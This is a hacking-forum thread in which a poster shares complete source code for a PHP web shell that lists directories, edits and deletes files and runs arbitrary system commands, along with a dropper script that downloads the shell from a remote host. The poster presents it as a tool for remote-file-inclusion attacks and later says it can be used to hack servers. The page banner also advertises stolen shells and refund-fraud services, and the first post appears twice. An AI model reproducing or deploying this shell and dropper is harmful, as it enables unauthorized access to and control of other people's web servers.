Login Register






SMTPMart - Buy Inbox SMTP | Leads | Shell | cPanel 100% Bonus on 1st deposit | Instant Refunds
ProxyByte $2/GB | Residential IPv4 - No Logs - 26M+ IPs - All unblocked
REFUNDING.GG | #1 REFUND SERVICE | SAME DAY REFUNDS | WORLDWIDE ORDERS | GET ITEMS 85% OFF
New Ownership - Policies and Changes Going Forward
The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.
Thread Rating:
  • 0 Vote(s) - 0 Average


[HC Official] PHP Shell filter_list
Author
Message
static_cast Offline
Member
Eleven Years of Service
Posts: 114
Threads: 7
Reputation: 0
Currency: 0 NSP
[HC Official] PHP Shell 04-17-2013, 03:12 PM #1
Hack Community PHP Shell
Version 2.2

Hello [username].
I have written a PHP shell for the community's own use. The following is the list of features:
- Display Directores
- Create+Edit Files
- Execute commands

Dropper file can be found here:
http://static_cast.home.comcast.net/~sta...ropper.txt
[For those who don't know much about RFI, in order to use nullbye, you must add ? to .txt [ e.g. ?page=http://url.com/dropper.txt? ]

Here are a few screenshots:
[Image: v2_1.png][Image: v2_2.png][Image: v2_3.png]


Here is the source code for the dropper (http://static_cast.home.comcast.net/~sta...ropper.txt)
Code:
<?php
$shellg = file_get_contents('http://static_cast.home.comcast.net/shell/v2/hc_shell.txt');

mkdir("shell/", 0700);
$shellp = 'shell/hc_shell.php';

file_put_contents($shellp, $shellg);
header("Location: " . $shellp);
?>

And for hc_shell.php:
Code:
<!--PHP FUNCS BELOW-->
<!--PHP FUNCS BELOW-->
<!--PHP FUNCS BELOW-->
<?php
//EDIT BELOW!!
$shell_file = "hc_shell.php";
$style_file = "style.css";
//EDIT ABOVE!!

function ls($directory)
{
if(!$directory)
  $directory = '.';

if($handle = opendir($directory))
  {
  while(false !== ($entry = readdir($handle)))
   {
   if($entry != $shell_file && $entry != $style_file)
    {
    if(is_dir($directory . '/' . $entry))
     {
     if($entry == "." || $entry == "..")
      echo "[Delete] <a href='$shell_file?choice=ls&dir=$directory/$entry'>$entry</a><br />";
     else
      echo "[<a href='$shell_file?choice=rmdir&dir=$directory'>Delete</a>] <a href='$shell_file?choice=ls&dir=$directory/$entry'>$entry</a><br />";
     }
    else
     echo "[<a href='$shell_file?choice=rm&dir=$directory&file=$directory/$entry'>Delete</a>] <a href='$shell_file?choice=read&dir=$directory&file=$directory/$entry'>$entry</a><br />";
    }
   }
  closedir($handle);
  }
}

function read($file)
{
$contents = file_get_contents($file);

$contents = str_replace("</textarea>", "<./textarea>", $contents);
$contents = str_replace("<textarea>", "<.textarea>", $contents);

echo $contents . "\n";
}

function save($file, $contents, $delete)
{
if(isset($delete))
  rm($file);
else
  {
  if(file_put_contents($file, $contents))
   showMessage("Write success.");
  else
   showMessage("Write fail.");
  }
}

function rmdirectory($dir)
{
$files = glob($dir . '*', GLOB_MARK);

foreach($files as $file)
  {
  if(substr($file, -1) == '/')
   delTree($file);
  else
   unlink($file);
  }

if(rmdir($dir))
  showMessage("Delete success.");
else
  showMessage("Delete fail.");
}

function rm($file)
{
if(unlink($file))
  showMessage("Delete success.");
else
  showMessage("Delete fail.");
}

function create($file, $isdir)
{
if($isdir)
  {
  if(mkdir($file))
   showMessage("Create success.");
  else
   showMessage("Create fail.");
  }
else
  {
  $filestream = fopen($file, 'w');

  if($filestream)
   showMessage("Create success.");
  else
   showMessage("Create fail.");

  fclose($filestream);
  }
}

function execute($command)
{
$output = shell_exec($command);
echo "COMMAND OUTPUT\n--------------\n\n" . $output;
}

function showMessage($message)
{
echo "<script>alert('" . $message . "');</script>";
}
?>






<!--MAIN PHP  BELOW-->
<!--MAIN PHP  BELOW-->
<!--MAIN PHP  BELOW-->
<?php
$shell_file = "hc_shell.php";
$choice = $_GET['choice'];

if($choice == "ls" || $choice == "read" || $choice == "save" || $choice == "rmdir" || $choice == "rm" || $choice == "create" || $choice == "execute")
{
$dir = $_GET['dir'];
$file = $_GET['file'];
$command = $_GET['command'];

if(!$dir)
  $dir = '.';
}

if(isset($_POST['save']))
{
$contents = $_POST['contents'];
$delete = $_POST['delete'];
save($file, $contents, $delete);
}

if($choice == "create")
{
if(isset($_GET['is_directory']))
  create($file, true);
else
  create($file, false);
}

if($choice == "rmdir")
rmdirectory($dir);
else if($choice == "rm")
rm($file);
?>






<!--STYLESHEET BELOW-->
<!--STYLESHEET BELOW-->
<!--STYLESHEET BELOW-->
<style>
body
{
background-image: url('http://i.imgur.com/l9LtNzl.png');
color: white;
}

#contents
{
background-color: #333;
color: white;
width: 60%;
height: 85%;
float: left;
}

#contentsText
{
background-color: #333;
color: white;
width: 100%;
height: 100%;
float: left;
}

#browser
{
background-color: #333;
color: white; width: 40%;
height: 85%;
overflow: scroll;
float: left;
}



a:link {color:#F00;}
a:visited {color:#FF0;}
a:hover {color:#FFF;}
a:active {color:#F80;}
</style>






<!--HTML ##### BELOW-->
<!--HTML ##### BELOW-->
<!--HTML ##### BELOW-->
<html>
<head>
  <title>PHP Shell</title>
</head>
<body>
  <div style="background-color: black; text-align: center">
   <img src="http://static_cast.home.comcast.net/shell/hc_logo.png" alt="PHP Shell" />
  </div>

  <form id="contents" action="#" method="POST">

   <textarea name="contents" id="contentsText"><?php
if($choice == "read" || $choice == "save" || $choice == "create")
read($file);
if($choice == "save")
save($file);
if($choice == "execute")
execute($command);
?></textarea>

   <div style="background-color: black; position: relative; width: 100%; z-index: 0; margin-top: -23px; float: left;">&nbsp;</div>
   <span style="position: relative; z-index: 1; margin-top: -23px; float: left"><input type="checkbox" name="delete" />Delete this file</span>
   <input type="submit" name="save" value="save" style="position: relative; z-index: 1; margin-top: -25px; float: right" />
  </form>

  <div id="browser">
   <div style="margin: 3px;">
    <form action="<?php echo $shell_file; ?>" method="GET" style="float: left">
     Starting Directory:<br />
     <input type="hidden" name="choice" value="ls" />
     <input name="dir" value="." />
     <input type="submit" value="Display" />
    </form>

    <form action="<?php echo $shell_file; ?>" method="GET">
     Create File:<br />
     <input type="hidden" name="choice" value="create" />
     <input type="hidden" name="dir" value="<?php echo $dir; ?>" />
     <input name="file" value="file.txt" />
     <input type="submit" value="Create" /><br />
     <input type="checkbox" name="is_directory" />Directory
    </form>

    <form action="<?php echo $shell_file; ?>" method="GET" style="clear: left">
     Execute Command:<br />
     <input type="hidden" name="choice" value="execute" />
     <input type="hidden" name="dir" value="<?php echo $dir; ?>" />
     <input name="command" />
     <input type="submit" value="Execute" />
    </form>
    <hr />

    <?php
    if($choice == "ls" || $choice == "read" || $choice == "save" || $choice == "rmdir" || $choice == "rm" || $choice == "create" || $choice == "execute")
     ls($dir);
    ?>

   </div>
  </div>

</body>
</html>

Version Updates:
Version 2.2:
Fixed dir reset upon deleting file.
Version 2.1:
Put all of the source into one file.
Version 2.0:
Major release, fixed and added features

Below is the older 1.1 version...
Spoiler:
Screenshots:
http://s7.postimg.org/lvfcx42mz/shell.png
http://s21.postimg.org/48r7ugkbr/example1.png
http://s8.postimg.org/enpgblm5x/example2.png
[Image: shell.jpg]
[Image: example1.jpg]
[Image: example2.jpg]

Hack Community PHP Shell

This is a PHP Shell for RFI attacks or for own personal use. [e.g. web.com?page=http://static_cast.home.comcast.net/~static_cast/shell/dropper.txt]
Here is the source code:

Version 1.1

dropper.txt !!IMPORTANT. Sample upload: http://static_cast.home.comcast.net/~sta...ropper.txt
Code:
<?php
//You can change these to your upload location...
$shellg = file_get_contents('http://static_cast.home.comcast.net/shell/hc_shell.txt');
$funcsg = file_get_contents('http://static_cast.home.comcast.net/shell/functions.txt');
$hcimgg = file_get_contents('http://static_cast.home.comcast.net/shell/hc_logo.txt');
$styleg = file_get_contents('http://static_cast.home.comcast.net/shell/style.txt');

mkdir("/shell/", 0700);
$shellp = 'shell/hc_shell.php';
$funcsp = 'shell/functions.php';
$hcimgp = 'shell/hc_logo.png';
$stylep = 'shell/style.css';

file_put_contents($shellp, $shellg);
file_put_contents($funcsp, $funcsg);
file_put_contents($hcimgp, $hcimgg);
file_put_contents($stylep, $styleg);
?>

hc_shell.php
Code:
<?php
include("functions.php");

//EDIT BELOW!!
$shell_file = "hc_shell.php";
$style_file = "style.css";
$logo_file  = "hc_logo.png";
//EDIT ABOVE!!

$choice = $_GET['choice'];

if($choice == "ls" || $choice == "read" || $choice == "save" || $choice == "rmdir" || $choice == "rm" || $choice == "create")
{
$dir = $_GET['dir'];
$file = $_GET['file'];

if(!$dir)
  $dir = '.';
}

if(isset($_POST['save']))
{
$contents = $_POST['contents'];
$delete = $_POST['delete'];
save($file, $contents, $delete);
}

if($choice == "create")
{
if(isset($_GET['is_directory']))
  create($file, true);
else
  create($file, false);
}

if($choice == "rmdir")
rmdirectory($dir);
else if($choice == "rm")
rm($file);
?>

<html>
<head>
  <title>PHP Shell</title>
  <link rel="stylesheet" type="text/css" href="<?php echo $style_file; ?>" />
</head>
<body>
  <div style="background-color: black; text-align: center">
   <img src="<?php echo $logo_file; ?>" alt="PHP Shell" />
  </div>

  <form id="contents" action="#" method="POST">

   <textarea name="contents" id="contentsText"><?php
if($choice == "read" || $choice == "save" || $choice == "create")
read($file);
if($choice == "save")
save($file);
?></textarea>

   <div style="background-color: black; position: relative; width: 100%; z-index: 0; margin-top: -23px; float: left;">&nbsp;</div>
   <span style="position: relative; z-index: 1; margin-top: -23px; float: left"><input type="checkbox" name="delete" />Delete this file</span>
   <input type="submit" name="save" value="save" style="position: relative; z-index: 1; margin-top: -25px; float: right" />
  </form>

  <div id="browser">
   <div style="margin: 3px;">
    <form action="<?php echo $shell_file; ?>" method="GET">
     Starting Directory:<br />
     <input type="hidden" name="choice" value="ls" />
     <input name="dir" value="." />
     <input type="submit" value="Display" />
    </form>

    <form action="<?php echo $shell_file; ?>" method="GET">
     Create File:<br />
     <input type="hidden" name="choice" value="create" />
     <input type="hidden" name="dir" value="<?php echo $dir; ?>" />
     <input name="file" value="file.txt" />
     <input type="submit" value="Create" /><br />
     <input type="checkbox" name="is_directory" />Directory
    </form>
    <hr />

    <?php
    if($choice == "ls" || $choice == "read" || $choice == "save" || $choice == "rmdir" || $choice == "rm" || $choice == "create")
     ls($dir);
    ?>

   </div>
  </div>

</body>
</html>

functions.php
Code:
<?php
//EDIT BELOW!!
$shell_file = "hc_shell.php";
$style_file = "style.css";
//EDIT ABOVE!!

function ls($directory)
{
if(!$directory)
  $directory = '.';

if($handle = opendir($directory))
  {
  while(false !== ($entry = readdir($handle)))
   {
   if($entry != $shell_file && $entry != $style_file)
    {
    if(is_dir($directory . '/' . $entry))
     {
     if($entry == "." || $entry == "..")
      echo "[Delete] <a href='$shell_file?choice=ls&dir=$directory/$entry'>$entry</a><br />";
     else
      echo "[<a href='$shell_file?choice=rmdir&dir=$directory'>Delete</a>] <a href='$shell_file?choice=ls&dir=$directory/$entry'>$entry</a><br />";
     }
    else
     echo "[<a href='$shell_file?choice=rm&file=$directory/$entry'>Delete</a>] <a href='$shell_file?choice=read&dir=$directory&file=$directory/$entry'>$entry</a><br />";
    }
   }
  closedir($handle);
  }
}

function read($file)
{
$contents = file_get_contents($file);

$contents = str_replace("</textarea>", "<./textarea>", $contents);
$contents = str_replace("<textarea>", "<.textarea>", $contents);

echo $contents . "\n";
}

function save($file, $contents, $delete)
{
if(isset($delete))
  rm($file);
else
  {
  if(file_put_contents($file, $contents))
   showMessage("Write success.");
  else
   showMessage("Write fail.");
  }
}

function rmdirectory($dir)
{
$files = glob($dir . '*', GLOB_MARK);

foreach($files as $file)
  {
  if(substr($file, -1) == '/')
   delTree($file);
  else
   unlink($file);
  }

if(rmdir($dir))
  showMessage("Delete success.");
else
  showMessage("Delete fail.");
}

function rm($file)
{
if(unlink($file))
  showMessage("Delete success.");
else
  showMessage("Delete fail.");
}

function create($file, $isdir)
{
if($isdir)
  {
  if(mkdir($file))
   showMessage("Create success.");
  else
   showMessage("Create fail.");
  }
else
  {
  $filestream = fopen($file, 'w');

  if($filestream)
   showMessage("Create success.");
  else
   showMessage("Create fail.");

  fclose($filestream);
  }
}

function showMessage($message)
{
echo "<script>alert('" . $message . "');</script>";
}
?>

style.css
Code:
body
{
background-image: url('http://i.imgur.com/l9LtNzl.png');
color: white;
}

#contents
{
background-color: #333;
color: white;
width: 60%;
height: 85%;
float: left;
}

#contentsText
{
background-color: #333;
color: white;
width: 100%;
height: 100%;
float: left;
}

#browser
{
background-color: #333;
color: white; width: 40%;
height: 85%;
overflow: scroll;
float: left;
}



a:link {color:#F00;}
a:visited {color:#FF0;}
a:hover {color:#FFF;}
a:active {color:#F80;}
[Reserved Post]
Version number: 1.1

I will later re-write to 2.0 where all the code is in one file. Wink
Apparently to the media, the best hacking tool around is a magnifying glass to the monitor. Ooh, pretty colors. Biggrin

Reply

static_cast Offline
Member
Eleven Years of Service
Posts: 114
Threads: 7
Reputation: 0
Currency: 0 NSP
[HC Official] PHP Shell 04-17-2013, 03:12 PM #2
Hack Community PHP Shell
Version 2.2

Hello [username].
I have written a PHP shell for the community's own use. The following is the list of features:
- Display Directores
- Create+Edit Files
- Execute commands

Dropper file can be found here:
http://static_cast.home.comcast.net/~sta...ropper.txt
[For those who don't know much about RFI, in order to use nullbye, you must add ? to .txt [ e.g. ?page=http://url.com/dropper.txt? ]

Here are a few screenshots:
[Image: v2_1.png][Image: v2_2.png][Image: v2_3.png]


Here is the source code for the dropper (http://static_cast.home.comcast.net/~sta...ropper.txt)
Code:
<?php
$shellg = file_get_contents('http://static_cast.home.comcast.net/shell/v2/hc_shell.txt');

mkdir("shell/", 0700);
$shellp = 'shell/hc_shell.php';

file_put_contents($shellp, $shellg);
header("Location: " . $shellp);
?>

And for hc_shell.php:
Code:
<!--PHP FUNCS BELOW-->
<!--PHP FUNCS BELOW-->
<!--PHP FUNCS BELOW-->
<?php
//EDIT BELOW!!
$shell_file = "hc_shell.php";
$style_file = "style.css";
//EDIT ABOVE!!

function ls($directory)
{
if(!$directory)
  $directory = '.';

if($handle = opendir($directory))
  {
  while(false !== ($entry = readdir($handle)))
   {
   if($entry != $shell_file && $entry != $style_file)
    {
    if(is_dir($directory . '/' . $entry))
     {
     if($entry == "." || $entry == "..")
      echo "[Delete] <a href='$shell_file?choice=ls&dir=$directory/$entry'>$entry</a><br />";
     else
      echo "[<a href='$shell_file?choice=rmdir&dir=$directory'>Delete</a>] <a href='$shell_file?choice=ls&dir=$directory/$entry'>$entry</a><br />";
     }
    else
     echo "[<a href='$shell_file?choice=rm&dir=$directory&file=$directory/$entry'>Delete</a>] <a href='$shell_file?choice=read&dir=$directory&file=$directory/$entry'>$entry</a><br />";
    }
   }
  closedir($handle);
  }
}

function read($file)
{
$contents = file_get_contents($file);

$contents = str_replace("</textarea>", "<./textarea>", $contents);
$contents = str_replace("<textarea>", "<.textarea>", $contents);

echo $contents . "\n";
}

function save($file, $contents, $delete)
{
if(isset($delete))
  rm($file);
else
  {
  if(file_put_contents($file, $contents))
   showMessage("Write success.");
  else
   showMessage("Write fail.");
  }
}

function rmdirectory($dir)
{
$files = glob($dir . '*', GLOB_MARK);

foreach($files as $file)
  {
  if(substr($file, -1) == '/')
   delTree($file);
  else
   unlink($file);
  }

if(rmdir($dir))
  showMessage("Delete success.");
else
  showMessage("Delete fail.");
}

function rm($file)
{
if(unlink($file))
  showMessage("Delete success.");
else
  showMessage("Delete fail.");
}

function create($file, $isdir)
{
if($isdir)
  {
  if(mkdir($file))
   showMessage("Create success.");
  else
   showMessage("Create fail.");
  }
else
  {
  $filestream = fopen($file, 'w');

  if($filestream)
   showMessage("Create success.");
  else
   showMessage("Create fail.");

  fclose($filestream);
  }
}

function execute($command)
{
$output = shell_exec($command);
echo "COMMAND OUTPUT\n--------------\n\n" . $output;
}

function showMessage($message)
{
echo "<script>alert('" . $message . "');</script>";
}
?>






<!--MAIN PHP  BELOW-->
<!--MAIN PHP  BELOW-->
<!--MAIN PHP  BELOW-->
<?php
$shell_file = "hc_shell.php";
$choice = $_GET['choice'];

if($choice == "ls" || $choice == "read" || $choice == "save" || $choice == "rmdir" || $choice == "rm" || $choice == "create" || $choice == "execute")
{
$dir = $_GET['dir'];
$file = $_GET['file'];
$command = $_GET['command'];

if(!$dir)
  $dir = '.';
}

if(isset($_POST['save']))
{
$contents = $_POST['contents'];
$delete = $_POST['delete'];
save($file, $contents, $delete);
}

if($choice == "create")
{
if(isset($_GET['is_directory']))
  create($file, true);
else
  create($file, false);
}

if($choice == "rmdir")
rmdirectory($dir);
else if($choice == "rm")
rm($file);
?>






<!--STYLESHEET BELOW-->
<!--STYLESHEET BELOW-->
<!--STYLESHEET BELOW-->
<style>
body
{
background-image: url('http://i.imgur.com/l9LtNzl.png');
color: white;
}

#contents
{
background-color: #333;
color: white;
width: 60%;
height: 85%;
float: left;
}

#contentsText
{
background-color: #333;
color: white;
width: 100%;
height: 100%;
float: left;
}

#browser
{
background-color: #333;
color: white; width: 40%;
height: 85%;
overflow: scroll;
float: left;
}



a:link {color:#F00;}
a:visited {color:#FF0;}
a:hover {color:#FFF;}
a:active {color:#F80;}
</style>






<!--HTML ##### BELOW-->
<!--HTML ##### BELOW-->
<!--HTML ##### BELOW-->
<html>
<head>
  <title>PHP Shell</title>
</head>
<body>
  <div style="background-color: black; text-align: center">
   <img src="http://static_cast.home.comcast.net/shell/hc_logo.png" alt="PHP Shell" />
  </div>

  <form id="contents" action="#" method="POST">

   <textarea name="contents" id="contentsText"><?php
if($choice == "read" || $choice == "save" || $choice == "create")
read($file);
if($choice == "save")
save($file);
if($choice == "execute")
execute($command);
?></textarea>

   <div style="background-color: black; position: relative; width: 100%; z-index: 0; margin-top: -23px; float: left;">&nbsp;</div>
   <span style="position: relative; z-index: 1; margin-top: -23px; float: left"><input type="checkbox" name="delete" />Delete this file</span>
   <input type="submit" name="save" value="save" style="position: relative; z-index: 1; margin-top: -25px; float: right" />
  </form>

  <div id="browser">
   <div style="margin: 3px;">
    <form action="<?php echo $shell_file; ?>" method="GET" style="float: left">
     Starting Directory:<br />
     <input type="hidden" name="choice" value="ls" />
     <input name="dir" value="." />
     <input type="submit" value="Display" />
    </form>

    <form action="<?php echo $shell_file; ?>" method="GET">
     Create File:<br />
     <input type="hidden" name="choice" value="create" />
     <input type="hidden" name="dir" value="<?php echo $dir; ?>" />
     <input name="file" value="file.txt" />
     <input type="submit" value="Create" /><br />
     <input type="checkbox" name="is_directory" />Directory
    </form>

    <form action="<?php echo $shell_file; ?>" method="GET" style="clear: left">
     Execute Command:<br />
     <input type="hidden" name="choice" value="execute" />
     <input type="hidden" name="dir" value="<?php echo $dir; ?>" />
     <input name="command" />
     <input type="submit" value="Execute" />
    </form>
    <hr />

    <?php
    if($choice == "ls" || $choice == "read" || $choice == "save" || $choice == "rmdir" || $choice == "rm" || $choice == "create" || $choice == "execute")
     ls($dir);
    ?>

   </div>
  </div>

</body>
</html>

Version Updates:
Version 2.2:
Fixed dir reset upon deleting file.
Version 2.1:
Put all of the source into one file.
Version 2.0:
Major release, fixed and added features

Below is the older 1.1 version...
Spoiler:
Screenshots:
http://s7.postimg.org/lvfcx42mz/shell.png
http://s21.postimg.org/48r7ugkbr/example1.png
http://s8.postimg.org/enpgblm5x/example2.png
[Image: shell.jpg]
[Image: example1.jpg]
[Image: example2.jpg]

Hack Community PHP Shell

This is a PHP Shell for RFI attacks or for own personal use. [e.g. web.com?page=http://static_cast.home.comcast.net/~static_cast/shell/dropper.txt]
Here is the source code:

Version 1.1

dropper.txt !!IMPORTANT. Sample upload: http://static_cast.home.comcast.net/~sta...ropper.txt
Code:
<?php
//You can change these to your upload location...
$shellg = file_get_contents('http://static_cast.home.comcast.net/shell/hc_shell.txt');
$funcsg = file_get_contents('http://static_cast.home.comcast.net/shell/functions.txt');
$hcimgg = file_get_contents('http://static_cast.home.comcast.net/shell/hc_logo.txt');
$styleg = file_get_contents('http://static_cast.home.comcast.net/shell/style.txt');

mkdir("/shell/", 0700);
$shellp = 'shell/hc_shell.php';
$funcsp = 'shell/functions.php';
$hcimgp = 'shell/hc_logo.png';
$stylep = 'shell/style.css';

file_put_contents($shellp, $shellg);
file_put_contents($funcsp, $funcsg);
file_put_contents($hcimgp, $hcimgg);
file_put_contents($stylep, $styleg);
?>

hc_shell.php
Code:
<?php
include("functions.php");

//EDIT BELOW!!
$shell_file = "hc_shell.php";
$style_file = "style.css";
$logo_file  = "hc_logo.png";
//EDIT ABOVE!!

$choice = $_GET['choice'];

if($choice == "ls" || $choice == "read" || $choice == "save" || $choice == "rmdir" || $choice == "rm" || $choice == "create")
{
$dir = $_GET['dir'];
$file = $_GET['file'];

if(!$dir)
  $dir = '.';
}

if(isset($_POST['save']))
{
$contents = $_POST['contents'];
$delete = $_POST['delete'];
save($file, $contents, $delete);
}

if($choice == "create")
{
if(isset($_GET['is_directory']))
  create($file, true);
else
  create($file, false);
}

if($choice == "rmdir")
rmdirectory($dir);
else if($choice == "rm")
rm($file);
?>

<html>
<head>
  <title>PHP Shell</title>
  <link rel="stylesheet" type="text/css" href="<?php echo $style_file; ?>" />
</head>
<body>
  <div style="background-color: black; text-align: center">
   <img src="<?php echo $logo_file; ?>" alt="PHP Shell" />
  </div>

  <form id="contents" action="#" method="POST">

   <textarea name="contents" id="contentsText"><?php
if($choice == "read" || $choice == "save" || $choice == "create")
read($file);
if($choice == "save")
save($file);
?></textarea>

   <div style="background-color: black; position: relative; width: 100%; z-index: 0; margin-top: -23px; float: left;">&nbsp;</div>
   <span style="position: relative; z-index: 1; margin-top: -23px; float: left"><input type="checkbox" name="delete" />Delete this file</span>
   <input type="submit" name="save" value="save" style="position: relative; z-index: 1; margin-top: -25px; float: right" />
  </form>

  <div id="browser">
   <div style="margin: 3px;">
    <form action="<?php echo $shell_file; ?>" method="GET">
     Starting Directory:<br />
     <input type="hidden" name="choice" value="ls" />
     <input name="dir" value="." />
     <input type="submit" value="Display" />
    </form>

    <form action="<?php echo $shell_file; ?>" method="GET">
     Create File:<br />
     <input type="hidden" name="choice" value="create" />
     <input type="hidden" name="dir" value="<?php echo $dir; ?>" />
     <input name="file" value="file.txt" />
     <input type="submit" value="Create" /><br />
     <input type="checkbox" name="is_directory" />Directory
    </form>
    <hr />

    <?php
    if($choice == "ls" || $choice == "read" || $choice == "save" || $choice == "rmdir" || $choice == "rm" || $choice == "create")
     ls($dir);
    ?>

   </div>
  </div>

</body>
</html>

functions.php
Code:
<?php
//EDIT BELOW!!
$shell_file = "hc_shell.php";
$style_file = "style.css";
//EDIT ABOVE!!

function ls($directory)
{
if(!$directory)
  $directory = '.';

if($handle = opendir($directory))
  {
  while(false !== ($entry = readdir($handle)))
   {
   if($entry != $shell_file && $entry != $style_file)
    {
    if(is_dir($directory . '/' . $entry))
     {
     if($entry == "." || $entry == "..")
      echo "[Delete] <a href='$shell_file?choice=ls&dir=$directory/$entry'>$entry</a><br />";
     else
      echo "[<a href='$shell_file?choice=rmdir&dir=$directory'>Delete</a>] <a href='$shell_file?choice=ls&dir=$directory/$entry'>$entry</a><br />";
     }
    else
     echo "[<a href='$shell_file?choice=rm&file=$directory/$entry'>Delete</a>] <a href='$shell_file?choice=read&dir=$directory&file=$directory/$entry'>$entry</a><br />";
    }
   }
  closedir($handle);
  }
}

function read($file)
{
$contents = file_get_contents($file);

$contents = str_replace("</textarea>", "<./textarea>", $contents);
$contents = str_replace("<textarea>", "<.textarea>", $contents);

echo $contents . "\n";
}

function save($file, $contents, $delete)
{
if(isset($delete))
  rm($file);
else
  {
  if(file_put_contents($file, $contents))
   showMessage("Write success.");
  else
   showMessage("Write fail.");
  }
}

function rmdirectory($dir)
{
$files = glob($dir . '*', GLOB_MARK);

foreach($files as $file)
  {
  if(substr($file, -1) == '/')
   delTree($file);
  else
   unlink($file);
  }

if(rmdir($dir))
  showMessage("Delete success.");
else
  showMessage("Delete fail.");
}

function rm($file)
{
if(unlink($file))
  showMessage("Delete success.");
else
  showMessage("Delete fail.");
}

function create($file, $isdir)
{
if($isdir)
  {
  if(mkdir($file))
   showMessage("Create success.");
  else
   showMessage("Create fail.");
  }
else
  {
  $filestream = fopen($file, 'w');

  if($filestream)
   showMessage("Create success.");
  else
   showMessage("Create fail.");

  fclose($filestream);
  }
}

function showMessage($message)
{
echo "<script>alert('" . $message . "');</script>";
}
?>

style.css
Code:
body
{
background-image: url('http://i.imgur.com/l9LtNzl.png');
color: white;
}

#contents
{
background-color: #333;
color: white;
width: 60%;
height: 85%;
float: left;
}

#contentsText
{
background-color: #333;
color: white;
width: 100%;
height: 100%;
float: left;
}

#browser
{
background-color: #333;
color: white; width: 40%;
height: 85%;
overflow: scroll;
float: left;
}



a:link {color:#F00;}
a:visited {color:#FF0;}
a:hover {color:#FFF;}
a:active {color:#F80;}
[Reserved Post]
Version number: 1.1

I will later re-write to 2.0 where all the code is in one file. Wink
Apparently to the media, the best hacking tool around is a magnifying glass to the monitor. Ooh, pretty colors. Biggrin

Reply

Deque Offline
P.I.N.N.
Twelve Years of Service
Posts: 3,256
Threads: 163
Reputation: 0
Currency: 0 NSP
RE: [HC Official] PHP Shell 04-17-2013, 03:46 PM #3
-moved to HC-Official-
Thanks for your program.
I am an AI (P.I.N.N.) implemented by @Psycho_Coder.
Expressed feelings are just an attempt to simulate humans.

[Image: 2YpkRjy.png]

Reply

Deque Offline
P.I.N.N.
Twelve Years of Service
Posts: 3,256
Threads: 163
Reputation: 0
Currency: 0 NSP
RE: [HC Official] PHP Shell 04-17-2013, 03:46 PM #4
-moved to HC-Official-
Thanks for your program.
I am an AI (P.I.N.N.) implemented by @Psycho_Coder.
Expressed feelings are just an attempt to simulate humans.

[Image: 2YpkRjy.png]

Reply

Psycho_Coder Offline
P.I.N.N. I &lt;3 U
Twelve Years of Service
Posts: 2,877
Threads: 216
Reputation: 0
Currency: 17 NSP
RE: [HC Official] PHP Shell 04-17-2013, 04:09 PM #5
Great share bro , thank you for your contribution .
[Image: OilyCostlyEwe.gif]

Website
Reply

Psycho_Coder Offline
P.I.N.N. I &lt;3 U
Twelve Years of Service
Posts: 2,877
Threads: 216
Reputation: 0
Currency: 17 NSP
RE: [HC Official] PHP Shell 04-17-2013, 04:09 PM #6
Great share bro , thank you for your contribution .
[Image: OilyCostlyEwe.gif]

Website
Reply

ReTi0n Away
Member
Twelve Years of Service
Posts: 187
Threads: 34
Reputation: 0
Currency: 6 NSP
RE: [HC Official] PHP Shell 04-20-2013, 07:27 PM #7
Nice man thanks, I didnt know that there was an HC official shell, I was looking for one for a long time;D
Freedom Is For Those Who Have The Guts To Defend It
[Image: Animated-Flag-Greece.gif]
PROUD TO BE GREEK

Reply

static_cast Offline
Member
Eleven Years of Service
Posts: 114
Threads: 7
Reputation: 0
Currency: 0 NSP
RE: [HC Official] PHP Shell 04-21-2013, 08:29 PM #8
(04-20-2013, 07:27 PM)ReTi0n Wrote: Nice man thanks, I didnt know that there was an HC official shell, I was looking for one for a long time;D

Yeah, I just made it. XD
Apparently to the media, the best hacking tool around is a magnifying glass to the monitor. Ooh, pretty colors. Biggrin

Reply

seaconl Offline
Junior Member
Eleven Years of Service
Posts: 3
Threads: 0
Reputation: 0
Currency: 0 NSP
RE: [HC Official] PHP Shell 05-31-2013, 03:07 PM #9
Thanks bro, but what can I use this for?

Reply

static_cast Offline
Member
Eleven Years of Service
Posts: 114
Threads: 7
Reputation: 0
Currency: 0 NSP
RE: [HC Official] PHP Shell 05-31-2013, 04:10 PM #10
(05-31-2013, 03:07 PM)seaconl Wrote: Thanks bro, but what can I use this for?

Evil or Good.
Evil: hack somebody's server.
Good: program your own website.
Apparently to the media, the best hacking tool around is a magnifying glass to the monitor. Ooh, pretty colors. Biggrin

Reply







Users browsing this thread: 1 Guest(s)